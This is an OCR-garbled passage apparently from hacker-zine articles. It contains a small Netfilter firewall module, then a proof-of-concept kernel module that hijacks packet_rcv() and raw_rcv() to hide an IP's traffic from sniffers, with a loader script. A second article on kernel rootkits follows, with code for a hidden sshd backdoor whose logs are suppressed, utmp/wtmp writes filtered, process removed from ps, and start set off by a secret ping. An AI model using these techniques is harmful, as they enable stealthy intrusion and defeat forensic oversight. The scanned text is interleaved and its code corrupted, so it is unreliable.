replace our hijacking 


s of these instructions (substituting 
dress) are: 


x00 0x00 


tion of an LKM we change the function 
the code above to that of our hook 
ur hook function run first. When (if) 
ginal function we simply restore the 
beginning, call the function and then 

code. Simple, but powerful. Silvio 


Cesare has written a document a while ago detailing kernel 


function hijacking. See 


Now to hide packets 
write the hook functio 
matches our criteria to 
function simply returns 
never gets called. If 


[4] in the references. 


from packet sockets we need to first 
n that will check to see if a_ packet 
be hidden. If it does, then our hook 
zero to it’s caller and packet_rcv() 
packet_rev() never gets called, then 


the packet is never 
socket. Note that it 
packet will be dropped 
from being sent to pac 
socket will still see 
made that packet invis 
be running on the host. 
process and log the con 


In theory that’s all 
be done for raw  socke 


need to hook the raw_ 


next section will pre 
example LKM that will 

functions and hide any 
address that we specify 


--[ 7 - Conclusion 


Hopefully by now you hav 
is, how to use it andw 
knowledge to hide specia 
the local machine.If you 
tutorial then just emai 
comments or suggestions 
something interesting wi 


--[{ A - Light-Weight Fir 


delivered to the user space packet 
is only the *packet* socket that this 
on. If we want to filter FTP packets 
ket sockets then the FTP server’s TCP 
the packet. All that we’ve done is 
ible to any sniffer software that may 
The FIP server will still be able to 
nection. 


there is too it. The same thing can 
ts as well. The difference is that we 
rev() function (net/ipv4/raw.c). The 
sent and discuss source code for an 
hijack the packet_rcev() and raw_rcv() 
packets going to or coming from an IP 


e at least a basic understanding of what Netfilter 

hat you can do with it. You should also have the 

1 network traffic from sniffing software running on 
would like a tarball of the sources used for this 

1 me. I would also appreciate any corrections, 

. Now I leave it to you and your imagination to do 

th what I have presented her 


e Wall 


----[ A.1 - Overview 


The Light-Weight Fire 
demonstrates the basic 
in section 4.LWFW also 
system call. 


Because the LWFW source 
a brief overview of how 
its first task is to 
before the ioctl () inte 
needs to be made in /dev 


Wall (LWFW) is a simple kernel module that 
packet filtering techniques that were presented 
provides a control interface through the ioctl() 


is sufficiently documented I will only provide 
it works. When the LWFW module is installed 
try and register the control device. Note that 
rface to LWFW can be used, a character device fil 
. $f the control device registration succeeds the 


13.txt 


"in use" 


Wed Apr 26 09:43:44 2017 20 
marker is cleared and the hook function for NF_IP_PRE_ ROUTE is 


registered. 


The clean-up function simply does the reverse of this process. 


LWFW provides three basic options for dropping packets. These are, in the 
order of processing: 
-- Source interface 
—- Source IP address 

—- Destination TCP port 


The last thing worth 
packet comes into t 


functions are respo 
dropped packets. 


he specifics of these rules are set with the ioctl() interface. 


LWFW_G 


T 

When a packet is received LWFW will check it against all the rules which 
have been set. If it 
xr 
t 
fe) 


matches any of the rules then the hook function will 


eturn NF_DROP and Netfilter will silently drop the packet. Otherwise 
he hook function will return NF_ACCEPT and the packet will continue 
n its way. 


mentioning is LWFW’s statistics logging. Whenever a 


he hook function and LWFW is active the total 
number of packets seen is incremented. The individual rules checking 
nsible for incrementing their respective count of 
Note that when a rule’s value is changed its count of 
dropped packets is reset to zero. The lwfwstats program utilises the 
ET STATS IOCTL to get a copy of the statistics structure and 


display it’s contents. 


Sell 


A.2 


—V/ THe SOURCES s4 lwfw.c 


<++> lwfw/lwfw.c 
/* Light-weight Fire Wall. Simple firewall utility based on 
* Netfilter for 2.4. Designed for educational purposes. 


* 


* Written by bioforge - March 2003. 


* 


/ 


nc] 


de 


define MOD 


#define _K 


ERNEI 


nc] 
nc] 


de 
de 


nc] 


de 


nc] 


de 


nc] 


de 


nc] 


de 


nc] 


de 


nc] 


de 


nc] 


de 


nc] 


de 


nc] 


de 


Oe gt em Be ee Poe Oe ee ee 


nc] 


Gre SG, {Gr GG VG Gy Kee VG, Vir Ge OG 2G 


de 


NKR KA KR KA AKA KA AAAKAAN 


fates fe ps ea a | Ge Spe es ps ne, eas es La. 
=) 
G 


i 


Nc 


ncl 
nc 


lu 


de 
de 


de 


/* Local 
statiec 4 
static 
static 
static 
static 
static 


EE ell al me 


nux/module.h> 
nux/kernel .h> 
nux/net .h> 
nux/types.h> 
nux/skbuff.h> 
nux/string.h> 
x/malloc.h> 
nux/netdevice.h> 
nux/netfilter.h> 
nux/netfilter_ipv4.h> 
nux/in.h> 

nux/ip.h> 

nux/tcp.h> 


<asm/errno.h> 
<asm/uaccess.h> 


"lwfw.h" 


function prototypes */ 


nt 
nt 
nt 
nt 
nt 
nt 


set_if_rul 
set_ip_rul 


le(char *name); 
e(unsigned int ip); 


set_port_rule (unsigned short port); 
check_ip_packet (struct sk_buff *skb); 
check_tcp_packet (struct sk_buff *skb); 
copy_stats(struct lwfw_stats *statbuff); 


/* Some function prototypes to be used by lwfw_fops below. */ 


static 


j 


nt 


lwfw_ioctl (struct inode *inode, struct file *file, 


unsigned int cmd, unsigned long arg); 
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static int lwfw_open(struct inode *inode, struct file *file); 


static int lwfw_release(struct inode *inode, struct file *file); 


/* Various flags used by the module */ 


/* This flag makes sure that only one instance of the lwfw device 


* can be in use at any one time. */ 
static int lwfw_ctrl_in_use = 0; 


/* This flag marks whether LWFW should actually attempt rule checking. 


* If this is zero then LWFW automatically allows all packets. */ 


static int active = 0; 


/* Specifies options for the LWFW module */ 
static unsigned int lwfw_options = (LWFW_IF_DENY_ACTIVE 
| LWFW_IP_DENY_ACTIVE 


| LWFW_PORT_DENY_ACTIVE) ; 


static int major = 0; /* Control device major number */ 


/* This struct will describe our hook procedure. */ 
struct nf_hook_ops nfkiller; 


/* Module statistics structure */ 
static struct lwfw_stats lwfw_statistics = {0, 0, O, O, O}; 


/* Actual rule ’definitions’. */ 


/* TODO: One day LWFW might actually support many simultaneous rules. 


* Just as soon as I figure out the list_head mechanism... 
static char *deny_if = NULL; 


/* Interface to deny */ 
static unsigned int deny_ip = 0x00000000; /* IP address to deny */ 


static unsigned short deny_port = 0x0000; /* TCP port to deny */ 


/* 
* This is the interface device’s file_operations structure 
Au 

struct file_operations Ilwfw_fops = { 

NULL, 
NULL, 
NULL, 
NULL, 
NULL, 
NULL, 
lwfw_ioctl, 
NULL, 
lwfw_open, 
NULL, 
lwfw_release, 
NULL /* Will be NULL’ed from here... 

}; 

MODULE_AUTHOR ("bioforge") ; 

MODULE_DESCRIPTION ("Light-Weight Firewall for Linux 2.4"); 

/* 

* This is the function that will be called by the hook 


a]; 
unsigned int lwfw_hookfn(unsigned int hooknum, 
struct sk_buff **skb, 
const struct net_device *in, 
const struct net_device *out, 
int (*okfn) (struct sk_buff *)) 


unsigned int ret = NF_ACCEPT; 


/* If LWFW is not currently active, immediately return ACC 


if (!active) 
return NF_ACCEPT; 


EPT */ 


*/ 
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lwfw_statistics.total_seentt; 


/* Check the interface rule first */ 
if (deny_if && DENY_IF_ACTIVE) { 
if (strcemp(in->name, deny_if) == 0) { /* Deny this interface */ 
lwfw_statistics.if_dropped++; 
lwfw_statistics.total_droppedtt+; 
return NF_DROP; 


/* Check the IP address rule */ 
if (deny_ip && DENY_IP_ACTIVE) { 
ret = check_ip_packet (*skb) ; 
if (ret != NF_ACCEPT) return ret; 


/* Finally, check the TCP port rule */ 
if (deny_port && DENY_PORT_ACTIVE) { 
ret = check_tcp_packet (*skb); 
if (ret != NF_ACCEPT) return ret; 


} 


return NF_ACCEPT; /* We are happy to keep the packet */ 
} 


/* Function to copy the LWFW statistics to a userspace buffer */ 
static int copy_stats(struct lwfw_stats *statbuff) 
{ 


NULL_CHECK (statbuff); 


copy_to_user(statbuff, &lwfw_statistics, 
sizeof (struct lwfw_stats)); 


return 0; 


/* Function that compares a received TCP packet’s destination port 
* with the port specified in the Port Deny Rule. If a processing 
* error occurs, NF_ACCEPT will be returned so that the packet is 
* not lost. */ 

static int check_tcp_packet (struct sk_buff *skb) 

{ 


/* Seperately defined pointers to header structures are used 
* to access the TCP fields because it seems that the so-called 
* transport header from skb is the same as its network header TCP packets. 
* If you don’t believe me then print the addresses of skb->nh.iph 
* and skb->h.th. 
* It would have been nicer if the network header only was IP and 
* the transport header was TCP but what can you do? */ 
struct tcphdr *thead; 


/* We don’t want any NULL pointers in the chain to the TCP header. */ 
if (!skb ) return NF_ACCEPT; 
if (!(skb->nh.iph)) return NF_ACCEPT; 


/* Be sure this is a TCP packet first */ 
if (skb->nh.iph->protocol != IPPROTO_TCP) { 
return NF_ACCEPT; 


} 
thead = (struct tcphdr *) (skb->data + (skb->nh.iph->ihl * 4)); 


/* Now check the destination port */ 
if ((thead->dest) == deny_port) { 
/* Update statistics */ 
lwfw_statistics.total_droppedtt+; 
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lwfw_statistics.tcp_droppedtt; 


return NF_DROP; 
} 


return NF_ACCEPT; 


/* Function that compares a received IPv4 packet’s source address 
* with the address specified in the IP Deny Rule. If a processing 
* error occurs, NF_ACCEPT will be returned so that the packet is 
* not lost. */ 

static int check_ip_packet (struct sk_buff *skb) 

{ 


/* We don’t want any NULL pointers in the chain to the IP header. */ 
if (!skb ) return NF_ACCEPT; 


if (!(skb->nh.iph)) return NF_ACCEPT; 
if (skb->nh.iph->saddr == deny_ip) {/* Matches the address. Barf. */ 
lwfw_statistics.ip_dropped+t+; /* Update the statistics */ 


lwfw_statistics.total_droppedtt+; 


return NF_DROP; 


return NF_ACCEPT; 
} 


static int set_if_rule(char *name) 
{ 
int ret = 0; 
char *if_dup; /* Duplicate interface */ 


/* Make sure the name is non-null */ 
NULL_CHECK (name) ; 


/* Free any previously saved interface name */ 
if (deny_if) { 

kfree (deny_if); 

deny_if = NULL; 


= kmalloc(strlen((char *)name) + 1, GFP_KERNEL) ) 
== NULL) { 
ret = —-ENOMEM; 

} else { 
memset (i 
memcpy (i 


_dup, 0x00, strlen((char *)name) + 1); 
_dup, (char *)name, strlen((char *)name)); 


Fr Fh 


} 


deny_if = if_dup; 


lwfw_statistics.if_dropped = 0; /* Reset drop count for IF rule */ 
printk("LWFW: Set to deny from interface: %s\n", deny_if); 


return ret; 


} 


static int set_ip_rule(unsigned int ip) 


{ 


deny_ip = ip; 
lwfw_statistics.ip_dropped = 0; /* Reset drop count for IP rule */ 
printk("LWFW: Set to deny from IP address: %d.%d.%d.%d\n", 

ip & OxOQOQO000FF, (ip & OxOO00FF00) >> 8, 

(ip & OxOOFFO000) >> 16, (ip & OxFFO00000) >> 24); 


return 0; 
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static int set_port_rule(unsigned short port) 
{ 
deny_port = port; 
lwfw_statistics.tcp_dropped = 0; /* Reset drop count for TCP rule */ 


printk("LWFW: Set to deny for TCP port: %d\n", 
((port & OxFFO0O) >> 8 | (port & OxOOFF) << 8)); 


return 0; 


} 


[BOK KR KKK KK KK KK OR RK KK OK KK / 
/* 
* File operations functions for control device 
ad 
static int lwfw_ioctl(struct inode *inode, struct file *file, 
unsigned int cmd, unsigned long arg) 


int ret = 0; 


switch (cmd) 
case LWFW_GET_VERS: 

return LWFW_VERS,; 
case LWFW_ACTIVATE: { 

active = 1; 

printk("LWFW: Activated.\n"); 

if ('deny_if && !deny_ip && !deny_port) { 

printk("LWFW: No deny options set.\n"); 


} 
break; 
} 
case LWFW_DEACTIVATE: { 
active *= active; 
printk("LWFW: Deactivated. \n") ; 
break; 


} 
case LWFW_GET_STATS: { 
ret = copy_stats((struct lwfw_stats *)arg); 
break; 


} 
case LWFW_DENY_IF: { 


ret = set_if_rule((char *)arg); 
break; 


} 
case LWFW_DENY_IP: { 


ret = set_ip_rule((unsigned int)arg); 
break; 


} 
case LWFW_DENY_PORT: { 


ret = set_port_rule((unsigned short) arg); 
break; 
} 
default: 
ret = -EBADRQC; 


}; 


return ret; 


} 


/* Called whenever open() is called on the device file */ 
static int lwfw_open(struct inode *inode, struct file *file) 
{ 

if (lwfw_ctrl_in_use) { 

return —-EBUSY; 

} else { 
MOD_INC_USE_COUN 
lwfw_ctrl_in_usett+; 


~“e 
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return 0; 


} 


return 0; 


} 


/* Called whenever close() is called on the device file */ 
static int lwfw_release(struct inode *inode, struct file *file) 


{ 


n= 


lwfw_ctrl_in_use *= lwfw_ctrl_in_use; 
MOD_DEC_USE_COUNT; 
return 0; 


} 


[BORK KR KKK KK OK KK OK KK OK OK KK / 
/* 
* Module initialisation and cleanup follow... 
my. 
int init_module() 


{ 


/* Register the control device, /dev/lwfw */ 
SET_MODULE_OWNER (&lwfw_fops) ; 


/* Attempt to register the LWFW control device */ 
if ((major = register_chrdev (LWFW_MAJOR, LWFW_NAME, 
&lwfw_fops)) < 0) { 
printk("LWFW: Failed registering control device!\n"); 
printk("LWFW: Module installation aborted.\n"); 
return major; 


} 


/* Make sure the usage marker for the control device is cleared */ 
lwfw_ctrl_in_use “= lwfw_ctrl_in_use; 


printk("\nLWFW: Control device successfully registered.\n"); 


/* Now register the network hooks */ 
nfkiller.hook = lwfw_hookfn; 


nfkiller.hooknum = NF_IP_PRE ROUTING; /* First stage hook */ 
nfkiller.pf = PF_INET; /* IPV4 protocol hook */ 
nfkiller.priority = NF_IP_PRI_FIRST; /* Hook to come first */ 
/* And register... */ 


nf_register_hook (énfkiller) ; 


printk("LWFW: Network hooks successfully installed.\n"); 


printk("LWFW: Module installation successful.\n"); 
return 0; 


} 


void cleanup_module() 


{ 


int ret; 


/* Remove IPV4 hook */ 
nf_unregister_hook (&énfkiller); 


/* Now unregister control device */ 
if ((ret = unregister_chrdev (LWFW_MAJOR, LWFW_NAME)) != 0) { 
printk("LWFW: Removal of module failed!\n"); 


} 


/* If anything was allocated for the deny rules, fr it here */ 
if (deny_if) 
kfree (deny_if); 


printk("LWFW: Removal of module successful.\n"); 
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<a> 


<++> lwfw/lwfw.h 


/* Include file for the Light-weight Fire Wall LKM. 
* 


A very simple Netfilter module that drops backets based on either 
their incoming interface or source IP address. 


Written by bioforge March 2003 


* 
* 
* 
* 
*/ 
#ifndef _ LWFW_INCLUD 
# define __LWFW_INCLU 


GJ 


/* NOTE: The LWFW_MAJOR symbol is only made available for kernel code. 
* Userspace code has no business knowing about it. */ 
define LWFW_NAME "lwftw" 

/* Version of LWFW */ 
define LWFW_VERS 0x0001 fe OeL #7 

/* Definition of the LWFW_TALKATIVE symbol controls whether LWFW will 
* print anything with printk(). This is included for debugging purposes. 
* / 

define LWFW_TALKATIVE 

/* These are the IOCTL codes used for the control device */ 

define LWFW_CTRL_SET OxFEEDOOO0O /* The OxFEED... prefix is arbitrary */ 
define LWFW_GET_VERS OxFEEDOOOL /* Get the version of LWFM */ 
define LWFW_ACTIVATE OxFEEDO002 

define LWFW_DEACTIVATE OxFEED0003 

define LWFW_GET_STATS OxFEEDOO004 

define LWFW_DENY_IF OxFEEDOO005 

define LWFW_DENY_IP OxFEEDO006 

define LWFW_DENY_PORT OxFEEDOOO7 

/* Control flags/Options */ 

define LWFW_IF_DENY_ACTIVE 0x00000001 

define LWFW_IP_DENY_ACTIVE 0x00000002 

define LWFW_PORT_DENY_ACTIVE 0x00000004 


/* Statistics structure for 


* Note that whenever a rule’s condition is changed th 


LWEW. 
relat 


d 


* xxx_dropped field is reset. 


*/ 


stru 


ct lwfw_stats { 


unsigned int if_dropped; /* Packets dropped by interface rule */ 
unsigned int ip_dropped; /* Packets dropped by IP addr. rule */ 
unsigned int tcp_dropped; /* Packets dropped by TCP port rule */ 
unsigned long total_dropped; /* Total packets dropped */ 

unsigned long total_seen; /* Total packets seen by filter */ 


}; 
/* 


* From here on is used solely for the actual kernel module 
*/ 
ifdef 


__K 


ERN 


EL 


define LWFW_MAJOR 241 /* This exists in the experimental range */ 
/* This macro is used to prevent dereferencing of NULL pointers. If 

* a pointer argument is NULL, this will return -EINVAL */ 
#define NULL_CHECK (ptr) x 

if ((ptr) == NULL) return —-EINVAL 

/* Macros for accessing options */ 
#define DENY_IF_ACTIVE (lwfw_options & LWFW_IF_DENY_ACTIVE) 
#define DENY_IP_ACTIVE (lwfw_options & LWFW_IP_DENY_ACTIVE) 
#define DENY_PORT_ACTIVE (lwfw_options & LWFW_PORT_DENY_ACTIVE) 
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endif /* KERNEL */ 
endif 
<--> 


<++> lwfw/Makefile 
CC= egcs 

CFLAGS= -Wall -0O2 
OBJS= lwfw.o 


~C.O: 
$(CC) -c $< -o $@ $ (CFLAGS) 


all: S$(OBJS) 


clean: 
EM. =rt “vo 
rm -rf ./*7~ 
<--> 


--[ B - Code for section 6 


Presented here is a simple module that will hijack the 
packet_recv() and raw_rcv() functions to hide any packets to 
or from the IP address we specify. The default IP address 
is set to 127.0.0.1, but this can be changed by changing the 
value of the #define IP. Also presented is a bash script 
that will get the addresses for the required functions from a 
System.map file and run insmod with these addresses as 


parameters in the required format. This loader script was 
written by grem. Originally for my Mod-off project, it was 
easily modified to suit the modul presented here. Thanks 


again grem. 


The presented module is proof-of-concept code only and as 
such, does not have anything in the way of module hiding. It 
is also important to remember that although this module can 
hide traffic from a sniffer running on the same host, a 
sniffer on a different host, but on the same LAN segment will 
still s the packets. From what is presented in the module, 
smart readers should have everything they need to design 
filtering functions to block any kind of packets they need. I 
have successfully used the technique presented in this text 
to hide control and information retrieval packets used by my 
other LKM projects. 


<++> pcaphide/pcap_block.c 
/* Kernel hack that will hijack the packet_rcev() function 


* which is used to pass packets to Libpcap applications 
* that use PACKET sockets. Also hijacks the raw_rcv() 
* function. This is used to pass packets to applications 
* that open RAW sockets. 

* 

* Written by bioforge - 30th June, 2003 

*/ 

define MODULE 

define __KERNEL__ 

include <linux/config.h> 

include <linux/module.h> 

include <linux/kernel.h> 

include <linux/netdevice.h> 

include <linux/skbuff.h> 

include <linux/smp_lock.h> 

include <linux/ip.h> /* For struct ip */ 


13.txt 


include <linux/if_ether.h> 


include <asm/page.h> 
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/* For ETH _P_IP */ 


/* For PAGE_OFFSET */ 


* IP address to hide 127.0.0.1 in NBO for Intel */ 


/* 
#define IP htonl (0x7F000001) 
/* Function pointer for origina 


static int (*pr) (struct sk_buff 


struct packet 


MODULE_PARM(pr, "i"); f% 


/* 


Function pointer for origina 


static int (*rr) (struct sock *s 
MODULE_PARM(rr, "i"); 


1 packet_rev() */ 
*skb, struct net_device *dev, 


_type *pt); 


Retrieved as insmod parameter */ 


l raw_rev() */ 
k, struct sk_buff *skb); 


/* Spinlock used for the parts where we un/hijack packet_rcev() */ 
static spinlock_t hijack_lock 


= SPIN_LOCK_UNLOCKED; 


/* Helper macros for use with the Hijack spinlock */ 


/* 
* 
* 
* 


* 


/* 


define HIJACK_LOCK spin_loc 


define HIJACK_UNLOCK  spin_unl 


define CODESIZE 10 


Original and hijack code buf 
Note that the hijack code al 
bytes ( inc eax; nop; dec 

simple hijack detection tech 
a move and a jump. */ 

For packet_rev() */ 


static unsigned char pr_code[CO 


static unsigned char pr_orig[CO 


/* 


k_irgsave (&hijack_lock, \ 
sl_flags) 
ock_irqrestore(&hijack_lock, \ 
sl_flags) 


fers. 
so provides 3 additional 
eax ) to try and throw 


For raw _rev() */ 


static unsigned char rr_code[CO 


static unsigned char rr_orig[CO 


/* 


niques that just look for 

DESIZE] = "\xb8\x00\x00\x00\x00" 
"\x40\x90\x48" 
"\xff\xe0"; 

DESIZE]; 

DESIZE] = "\xb8\x00\x00\x00\x00" 
"\x40\x90\x48" 
"\xff\xe0"; 

DESIZE]; 


Replacement for packet_rcv(). 


This is currently setup to hide 


* all packets with a source or destination IP address that we 


* 


specify. */ 


int hacked_pr(struct sk_buff *skb, struct net_device *dev, 
struct packet_type *pt) 


{ 


int sl_flags; 
int retval; 


/* Check if this is an IP p 
* hidden IP address. */ 
if (skb->protocol == htons ( 
if (skb->nh.iph->saddr == 
return 0; 


/* Call original */ 
HIJACK_LOCK; 

memcpy ((char *)pr, pr_orig, 
retval = pr(skb, dev, pt); 
memcpy ((char *)pr, pr_code, 
HIJACK_UNLOCK; 


return retval; 


/* Flags for spinlock */ 


acket going to or coming from our 


ETH_P_IP)) /* IP packet */ 


IP || skb->nh.iph->daddr == IP) 
/* Ignore this packet */ 


CODESIZE) ; 


CODESIZE) ; 
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/* Replacement for raw_rcev(). This is currently setup to hide 
* all packets with a source or destination IP address that we 
* specify. */ 

int hacked_rr(struct sock *sock, struct sk_buff *skb) 


{ 


int sl_flags; /* Flags for spinlock */ 


int retval; 


/* Check if this is an IP packet going to or coming from our 


* hidden IP address. */ 


if (skb->protocol == htons (ETH_P_IP) ) /* IP packet */ 
if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP) 
return 0; /* Ignore this packet */ 


/* Call original */ 

HIJACK_LOCK; 

memcpy ((char *)rr, rr_orig, CODESIZE); 
retval = rr(sock, skb); 
memcpy ((char *)rr, rr_code, CODESIZE); 
HIJACK_UNLOCK; 


return retval; 


int init _module() 


int sl_flags; /* Flags for spinlock */ 


/* pr & rr set as module parameters. If zero or < PAGE_OFFS 


KT 


* (which we treat as the lower bound of kernel memory), then 


* we will not install the hacks. */ 


if ((unsigned int)pr == || (unsigned int)pr < PAGE_OFFSET) 


printk ("Address for packet_rcev() not valid! (%08x)\n", 
(int) pr); 
return -1; 


} 


if ((unsigned int)rr == || (unsigned int)rr < PAGE_OFFSET) 


printk ("Address for raw_rcv() not valid! (%08x)\n", 
(int) rr); 
return -1; 


*(unsigned int *) (pr_code + 1) = (unsigned int)hacked_pr; 
*(unsigned int *) (rr_code + 1) = (unsigned int) hacked_rr; 


HIJACK_LOCK; 
memcpy (pr_orig, (char *)pr, CODESIZ 
memcpy ((char *)pr, pr_code, CODESIZ 
( 
( 


5 


oo™Ne 


5 


5 
~“e 


memcpy (rr_orig, (char *)rr, CODESIZ 
memcpy ((char *)rr, rr_code, CODESIZ 
HI JACK_UNLOCK; 


x 


5 
~‘e 


EXPORT_NO_SYMBOLS; 


return 0; 


} 


void cleanup_module() 


{ 
int sl_flags; 


lock_kernel (); 


HIJACK_LOCK; 

memcpy ((char *)pr, pr_orig, CODESIZE) ; 
memcpy ((char *)rr, rr_orig, CODESIZE) ; 
HIJACK_UNLOCK; 


{ 
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unlock_kernel(); 


} 


<-> 


<++> pcaphide/loader.sh 

!/bin/sh 
Written by grem, 30th June 2003 
Hacked by bioforge, 30th June 2003 


af [ wea = wee ] 5 then 
echo "Use: $0 <System.map>"; 
exit; 
fi 
MAP="$1" 
PR=‘cat SMAP | grep -w "packet_rcv" | cut -c 1-16°* 
RR=‘cat SMAP | grep -w "raw_rcv" | cut -c 1-16% 
if [ "SPR" = "" ]; then 
PR="00000000" 
fi 
if [ "$RR" = "" ]; then 
RR="00000000" 
fi 


echo "insmod pcap_block.o pr=0xSPR rr=0xSRR" 


# Now do the actual call to insmod 
insmod pcap_block.o pr=0xSPR rr=0x$RR 
<--> 


<++> pcaphide/Makefile 

€C=-gGC 

CFLAGS Wall -02 -fomit-—frame-pointer 
INCLUDES= -I/usr/src/linux/include 
OBJS= pcap_block.o 


~C.O: 
$(CC) -c $< -o $@ $(CFLAGS) $ (INCLUD 


Gl 
n 
~~ 


all: S$(OBJS) 


clean: 
PMH Ee 
rm -rf ./*7 
<--> 


[ References 


This appendix contains a list of references used in writing this article. 


1 The tcpdump group 
http: //www.tcpdump.org 
2 The Packet Factory 


http://www.packetfactory.net 

3 My network tools page - 

http://uqconnect.net/~ zzoklan/software/#net_tools 
4 Silvio Cesare’s Kernel Function Hijacking article 
http://vx.netlux.org/lib/vsc08.html 

5 Man pages for: 


-— raw (7) 
— packet (7) 
— tcpdump (1) 
[6] Linux kernel source files. In particular: 
—- net/packet/af_packet.c (for packet_rcv()) 


- net/ipv4/raw.c (for raw_rcv()) 
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net/core/dev.c 

- net/ipv4/netfilter/* 
7] Harald Welte’s Journey of a packet through the Linux 2.4 network 
stack 
http://gnumonks.org/ftp/pub/doc/packet—journey-2.4.html 
8] The Netfilter documentation page 
http://www.netfilter.org/documentation 
9] Phrack 55 - File 12 - 
http: //www.phrack.org/show.php?p=55&a=12 
A] Linux Device Drivers 2nd Ed. by Alessandro Rubini et al. 
B] Inside the Linux Packet Filter. A Linux Journal article 
http: //www.linuxjournal.com/article.php?sid=4852 
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--{ 1 - Introduction 


This article focuses on kernel based rootkits and how much they will be 
influenced by "normal" backdoors in future. Kernel based rootkits 

are there for a while, and they will be there in future, so some ideas 
and outlooks seem worth. 

Before reading this article, you should read the article regarding the 
netfilter hooks and the LKM relinking first. The backdoor impmentations I am 
speaking of and code snippets will utilize these. 

Please do not take this article too serious, it is not a description 
of how to hack if you read between the lines. I just express what I 
have experianced as "adore author" during the last years. This ranges from 
upset admins at congresses, weird questions at speaches, mails which 
cry for help, "adore sucks" messages at IRC, congratulations from 
-edu sites and so on. 


=-[ 2 = Sick of tall? 


Rootkits, and kernel based rootkits in particular, are available since a 

few years now, and some research has been done in this field. A lot of 
blubbering and even more blahs are published from time to time, and this is 
really annoying so I can understand if you do not read articles about rootkits 
anymore. Nevertheless, new obstacles come up and have to be addressed by 
rootkit (-authors) in the future. These include but are not limited to: 


new kernel-versions and vendor extensions 
—- absence of important symbols (namely sys_call_table) 
- advanced logging and auditing mechanisms 
- kernel hardening, trusted OS etc. 
- intrusion detection/abnormal behaivior detection 
—- advanced forensic tools and analysis methods 


While some of these points I try to address in adore-ng like avoiding 

of sys_call_table[] usage via VFS layer redirection, some points are 

still topic of research. Rootkits usually include logfile cleaners 

for the [u,w]tmp files, but this bites with the "least privilege" principle 
rule for intruders, which turns into a "least uploads to the system" 

rule. So, one point is to try to avoid logging at all, at the 

backdoor level (LKM level in our case) to have less binaries on the 
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target system. 
The trusted OS thingie has to be addressed in a own paper, and I already 
know which kernel hardening I want to look at spender. :-) 


--[ 3 Let it log 


During a speach about rootkits at a certain university by a forensic 
company I got some nice ideas how one can improve invisibillity. 

Today, advanced folks is probably dont patching the sshd binary anymore, 
but placing apropriate authentitation tokens at certain places 
(yes, distributed authentication mechanisms can be nasty for forensics). 
So, if the intruder is going to use the standard tools (he can also 
post-install uninstalled libraries and packages if they are missing; do you 
know which of the 3 admins installed the openssh package at pc-—5073?) 
the lkm-rootkit has somehow to ensure the logs the sshd sends go to 
/dev/null. One can do it this way: 


static int ssh(void *vp) 
{ 
char *a[] = {"/usr/bin/perl", "-e", 
"SENV{PATH}=’ /usr/bin:/bin:/sbin:/usr/sbin’;" 
"open (STDIN,’</dev/null’ ) ; open (STDOUT, ’>/dev/null’);" 
"open (STDERR,’>/dev/null’);" 
"exec(’sshd -e -d -p 2222');", 
NULL}; 


task_lock (current); 

REMOVE_LINKS (current) ; 

list_del (&current-—>thread_group) ; 

evil_sshd_pid = current->pid; 

task_unlock (current) ; 
xec_usermodehelper(*a, a, NULL); 
return 0; 


This looks like it could be called as kernel_thread() by a netfilter hook eh? 
-e" lets sshd log to stderr which is /dev/null in this case. Excellent. 
"-d" is a nice switch which forbids sshd to fork and therefore does 
not have open ports which can be detected after intruders login. 
REMOVE_LINK() makes the process invisible for ps and friends. Using perl 
is necessary to open stdin etc. becaus xec_usermodehelper() will close 
all files before starting sshd which makes sshd mix up stderr with the 
sockets when run with -e. 

The utmp/wtmp/lastlog logging can be avoided via: 


// parent must be evil sshd (since child which becomes the shell 
// logs the stuff) 
if (current->p_opptr && 
current-—>p_opptr->pid == evil_sshd_pid && evil_sshd_pid != 0) { 
for (i = 0; var_filenames[i]; ++i) { 
if (var_files[i] && f->f_dentry->d_inode->i_ino == 
var_files[i]->f_dentry->d_inode->i_ino) { 
task_unlock (current) ; 
*off += blen; 
return blen; 


} 


It looks whether the loggie is the sshd and whether it tries to 
write [u,w]ltmp entries into the appropriate files. Ofcorse we have 
to redirect the write() function in the VFS layer and to check 

the inode numbers to filter out the correct writes. Indeed, we 
would have to check the superblock too, but sshd is not 
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going to write to files with the same inode# on a different disk 
I think. 
Some pam modules open a session when one logs in, soa 


pam_unix2: session started for user root 
might appear in the logs even by the evil sshd with log redirection. 


So, as it seems, the log-issue can be solved in future backdoors/rootkits 
without messing too much with the system binaries. 


--[{ 4 Let it rock 


One needs a trigger to start the evil sshd, so nmap does not show open 

ports. Ofcorse. The netfilter article shows how one can build his 

own icmp-hooks to do so. I wont describe it again here, the article 

does it better than I could. Just one important point: as far as 

I have experianced you cannot start a program from within the hook directly. 
Kernel will crash badly, probably because the hook is somehow nested 

in an interrupt service routine. To overcome this problem, we set a flag that 
the sshd should be started: 


if (hit && (hit-1) % HIT_FREQ == 0) { 
write_lock (&ssh_lock) ; 
start_ssh = 1; 
write_unlock (&ssh_lock) ; 
return NF_DROP; 

} 


and since we mess with the VFS layer anyway, we also redirect the 

open() call (of the particular FS which /etc holds) so the next 

process that is opening a file on the same FS is starting the evil sshd. 
That might be a "ls" by root or we trigger it ourself via the real 
sshd that is running: 


root@linux:root# telnet 127.0.0.1 22 

Trying. 12°75%.0-..0)5 bis: 

Connected to 127.0.0.1. 

Escape character is ’%]’. 

SSH-2.0-OpenSSH_3.5pl 

SSH-2.0-OpenSSH_3.5p1 <<<<< pasted by attacker 
Connection closed by foreign host. 


On my machine this causes logs from the real sshd: 
sshd[1967]: fatal: No supported key exchange algorithms 


If one does not enter a valid protocol-string you get your IP logged: 


sshd[1980]: Bad protocol version identification ’’ from ::ffff:127.0.0.1 


Might be there are other services (with zero logs) which open files and 
trigger the start of the evil sshd like a httpd. 

Easy to see that it is possible for the kernel rootkit to 

supress certain log messages but by now it depends on the application 

and knowledge about when/what it will log. Not a too bad assumption 

for an intruder but in future intruders could use tainting-like mechanisms 
(taint every log-data that is caused by a hidden shell for example) 

to supress any logs the admin could find usefull for detecting the 
intruder. 


--[{ 5 Thinking about linking 


There is an article regarding LKM infection, please read it, its 

worth to spend the time. :-) 

However, one does not need to mess with the ELF format too much, a simple 
mmap() with a substitution of the init_module() and cleanup_module() 
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will suffice. Such a program has to be part of the rootkit, because 
rootkits have to be user-friendly, so they can easily set up by 
admins who run honeypot systems: 


root@linux:zero# ./configure 
Starting configuration 
generating secret pattern 
\\x37\\x8e\\x37\\x5f 
checking 4 SMP ... NO 
checking 4 MODVERSIONS ...NO 


Your secret ping commandline is: ping -s 32 -p 378e375f IP 


root@linux:zero# make 


